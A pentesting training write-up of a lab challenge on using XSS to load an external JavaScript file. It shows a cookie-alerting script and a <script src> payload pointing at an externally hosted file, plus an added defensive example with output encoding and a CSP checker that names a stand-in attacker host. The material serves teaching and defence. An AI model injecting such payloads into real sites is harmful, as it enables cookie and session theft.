XSS - including external js file: JS for Pentesters task 9 write up

Oct 29, 2014 • jsp, javascript, xss, security-tube

Write-up for task 9 of the series JS for Pentesters by SecurityTube: including an external JS file.

This challenge is a bit different from the ones we did till now. Consider a case where you found an XSS vulnerability, but you can enter only a limited number of characters through the vulnerable parameter and you need to do a lot more than that. What will you do? A possible way is to put the script inside a file and inject that file via the XSS. Let us see this with an example:

JS for Pentesters task 9

Our objective is to include an external JS file into this page; the code inside that JS file should pop the cookie in an alert box.

So the first task is to write a .js file that alerts the cookie and host it somewhere. The code for it is:

    alert(document.cookie);

Please note that when you are writing JavaScript inside a file, it shouldn't be enclosed in a <script> tag. So consider we created a file cookie.js which contains the code to alert the cookie. Now we should host the script somewhere so that it can be accessed via a public URL. I uploaded the script to my blog and tried to inject it into the challenge. The payload looks like this:

    <script src="http://security.securethelock.com/wp-content/uploads/2014/11/cookie.js"></script>

So as you can see, this challenge is fairly easy, but I hope you learned a good lesson from it. What we did is very simple. First upload the JavaScript file to a site and get its absolute location. Then you can inject the file via XSS by using the src attribute of a <script> tag.
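As an added example that is not part of the original write-up, the JavaScript below shows the same issue from the page owner's side: a constructed page that reflects a parameter unencoded, the output-encoding fix that turns a <script src> payload into inert text, and a small evaluator for the script-src directive of Content-Security-Policy, the second control that stops an externally hosted script from running even when a tag does get injected. The page markup, the attacker.example and app.example hosts, and the policy strings are all constructed for this example; the CSP evaluator covers only 'self', 'none', '*' and plain host sources, not nonces, hashes or wildcards.

```javascript
// Added example, not code from the original write-up. All markup, hosts and
// policies below are constructed for illustration.

// Constructed stand-in for the challenge page: the "name" parameter is
// reflected straight into the HTML, so a <script src="..."> in it becomes
// a real script element when the browser parses the response.
function renderVulnerable(name) {
  return `<p>Hello ${name}</p>`;
}

// Defence 1: contextual output encoding. Each character that can open or
// close a tag or attribute is replaced with its HTML entity, so the browser
// shows the payload as text instead of parsing it as markup.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

function renderSafe(name) {
  return `<p>Hello ${escapeHtml(name)}</p>`;
}

// Defence 2: Content-Security-Policy. A policy such as "script-src 'self'"
// makes the browser refuse scripts from any other origin, so an injected
// <script src="http://attacker.example/cookie.js"> never executes.
// Minimal evaluator: looks up script-src, falls back to default-src as the
// browser does, and matches 'self', 'none', '*' and plain host sources.
function scriptAllowedByCsp(policy, scriptUrl, pageOrigin) {
  const directives = policy
    .split(';')
    .map((d) => d.trim().split(/\s+/))
    .filter((parts) => parts[0] !== '');
  const directive =
    directives.find((p) => p[0] === 'script-src') ||
    directives.find((p) => p[0] === 'default-src');
  if (!directive) return true; // no applicable directive: nothing restricts scripts

  const script = new URL(scriptUrl);
  return directive.slice(1).some((src) => {
    if (src === "'none'") return false;
    if (src === '*') return true;
    if (src === "'self'") return script.origin === pageOrigin;
    if (src.includes('://')) {
      // scheme-qualified host source: compare full origins
      try { return new URL(src).origin === script.origin; } catch { return false; }
    }
    // scheme-less host source: compare host (and port, if any)
    return script.host === src;
  });
}

// Constructed payload of the kind discussed in the write-up.
const payload = '<script src="http://attacker.example/cookie.js"></script>';
console.log(renderVulnerable(payload)); // tag is parsed and the script loads
console.log(renderSafe(payload));       // tag is displayed as plain text
console.log(scriptAllowedByCsp("script-src 'self'", 'http://attacker.example/cookie.js', 'https://app.example')); // false
```

Both controls are needed: encoding stops the tag from existing in the first place, and CSP limits the damage when encoding is missed somewhere in the application. For a short reflected parameter the CSP check is also what defeats the "host the long part elsewhere" trick described above, since the external origin is simply not in the allow-list.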

Note:

1) While playing with XSS challenges, it is always recommended to use Mozilla Firefox, because Google Chrome has an inbuilt XSS filter which will stop us from executing arbitrary JavaScript code even if the page is vulnerable to XSS. So it's strongly recommended to use Firefox instead of Chrome.

We hope that you really liked this challenge. If there is anything you didn't understand or want more clarity on, please comment below and we are more than happy to help. Also, if you find a better way of solving the challenge, please share it with us; we are happy to learn from our readers too. Happy pentesting.

Anirudh Anand

Head of Product Security & DevSecOps at @CRED_club | Application Security ♥ | CTF lover - @teambi0s | Security Trainer - @7asecurity | certs - eWDP, OSCP, OSWE